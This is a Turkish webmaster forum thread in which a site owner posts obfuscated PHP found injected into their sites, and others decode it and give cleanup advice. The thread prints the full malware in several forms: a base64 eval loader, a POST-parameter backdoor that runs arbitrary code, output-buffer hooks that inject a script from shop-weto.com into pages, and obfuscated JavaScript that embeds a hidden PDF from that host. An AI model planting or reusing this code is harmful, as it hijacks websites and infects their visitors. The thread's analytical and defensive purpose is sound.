Sitelere bulaştırılan bir kod

Bugünlerde sitelere bulaştırılan bir kod var.
Pek çok kişinin şikayeti üzerine sitelerinden temizledim.

Bu kodun anlamını çözerseniz çok sevinirim, bu kod nedir, ne yapıyor...


Kod aşağıdaki gibi:

<?php eval(base64_decode('aWYoIWlzc2V0KCR4ZzYxKSl7ZnVuY3Rpb24geGc2KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM05vYjNBdGQyVjBieTVqYjIwdmRHVnRjR3hoZEdWekwyWm1ZWEV1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIHhnNjIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkeGc2MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkeGc2MSkpY2FsbF91c2VyX2Z1bmMoJHhnNjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0neGc2JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3hnNicpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSR4ZzZsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCd4ZzYyJykpIT0neGc2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?><?

İframe php ile şifrelenmiş. kodu çözülmüş hali;

if (! isset($xg61))
{

    function xg6 ($s)
    {
        if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
            foreach ($a[0] as $v)
                if (count(explode("\n", $v)) > 5)
                {
                    $e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
                    if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write')))
                        $s = str_replace($v, '', $s);
                }
        if (preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is', $s, $a))
            foreach ($a[0] as $v)
                if (preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i', $v) && ! strstr($v, '?' . '>'))
                    $s = preg_replace('#' . preg_quote($v, '#') . '.*?</iframe>#is', '', $s);
        $s = str_replace($a = base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3Nob3Atd2V0by5jb20vdGVtcGxhdGVzL2ZmYXEucGhwID48L3NjcmlwdD4='), '', $s);
        if (stristr($s, '<body'))
            $s = preg_replace('#(\s*<body)#mi', $a . '\1', $s);
        elseif (strpos($s, ',a'))
            $s .= $a;
        return $s;
    }

    function xg62 ($a, $b, $c, $d)
    {
        global $xg61;
        $s = array();
        if (function_exists($xg61))
            call_user_func($xg61, $a, $b, $c, $d);
        foreach (@ob_get_status(1) as $v)
            if (($a = $v['name']) == 'xg6')
                return;
            elseif ($a == 'ob_gzhandler')
                break;
            else
                $s[] = array($a == 'default output handler' ? false : $a);
        for ($i = count($s) - 1; $i >= 0; $i --)
        {
            $s[$i][1] = ob_get_contents();
            ob_end_clean();
        }
        ob_start('xg6');
        for ($i = 0; $i < count($s); $i ++)
        {
            ob_start($s[$i][0]);
            echo $s[$i][1];
        }
    }
}
$xg6l = (($a = @set_error_handler('xg62')) != 'xg62') ? $a : 0;
eval(base64_decode($_POST['e']));

çözülmüş halinin içindeki çözülmemiş satışın çözülmüş hali :

<script src=http://shop-weto.com/templates/ffaq.php ></script>

iframe virisüne benziyor. forumda aratirsaniz yeterince acik basliklar var

highlight_string(base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3Nob3Atd2V0by5jb20vdGVtcGxhdGVzL2ZmYXEucGhwID48L3NjcmlwdD4='));
echo '<br />';
highlight_string(file_get_contents('http://shop-weto.com/templates/ffaq.php'));

Kaynaktaki kod da bu, javascriptten anlayan biri varmı

//<script> 
try{if(oTu='*')throw new TypeError('%');}catch(rRjP){oTu=rRjP.message;} 
j4P='w64J6fJ63umentL2ew77rite(w22w3cw64iw76 sL74yleJ3dJ5cL22L70ositionL3aaJ62soluteL3b J6ceL66L74w3aw2dw3100J30pxJ3b topJ3aL2d1L3000w70w78w3bL5cw22w3eJ22)J3bdoJ63umJ65w6et.w77ritw65L28w27L3cw65mbed L77idtL68L3d1J300w20heightJ3d100w20w73rcJ3dL22httpJ3aJ2fJ2fw73hopw2dL77etJ6fw2ecL6fmw2fteJ6dplatesw2fffaL71.pL68pJ3fsL3dKJ422tJ63b5w26J69J64w3d2L22 typew3dJ22appL6cL69L63ationL2fpJ64fL22w3eJ3cL2fL65mbedL3eJ27)w3bw64L6fL63ument.w77rite(L22L3cL2fdivw3eJ22w29w3b'; 
eval(unescape(j4P.replace(/[LJw]/g,oTu))); 

//</script>

Çok sağolun, varolun.

Aynı iframeyi açık hali ile de koymuşlar. Zahmet edip bir de gizleyerek koymuşlar.
Fazladan zahmet etmişler.

1- Siliyorum
2- Bilgisayarı temizliyorum Avast Home ile
3- FTP şifresini değiştiriyorum
4- Server'a temiz halini atıyorum.

Ama yine birkaç gün sonra bulaşıyor...

cuteftp kullanıyorsan kullanma ayrıca parolanı ftp programına kaydetme. butun kodları temızledıgınden emin ol kaspersky öneririm.

document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
document.write('<embed width=100 height=100 src="http://shop-weto.com/templates/ffaq.php?s=KB2tcb5&id=2" type="application/pdf"></embed>');
document.write("</div>");

Log dosyanı açıp POST şeklinde yapılan istekleri buraya yazarmısın kodlarda $_POST['e'] diye bir değer var.
Log dosyan cpanel'de ,public_html ile aynı dizinde olan acess-log klasorunde bulunuyor.
+ olarak shop-weto.com bu sitenin sunucu ip adresinide banla .htaccess ile yada iptables ile

PC ne mail yada tıklama ile girmiş bir trojen yada bir ftp programı kullanıyorsan bundanda kaynaklanabilir.
Sana ait başka bir ftp ye daha girersen o siteyede bulaşacak bu kod.
Bundan kurtulmanın tek yolu önce format, sonra ftp şifresini değiştir ve en son olarakta temiz sayfaları gönder ftp ne. sadece index dosyalarına bulaşmış olabilir.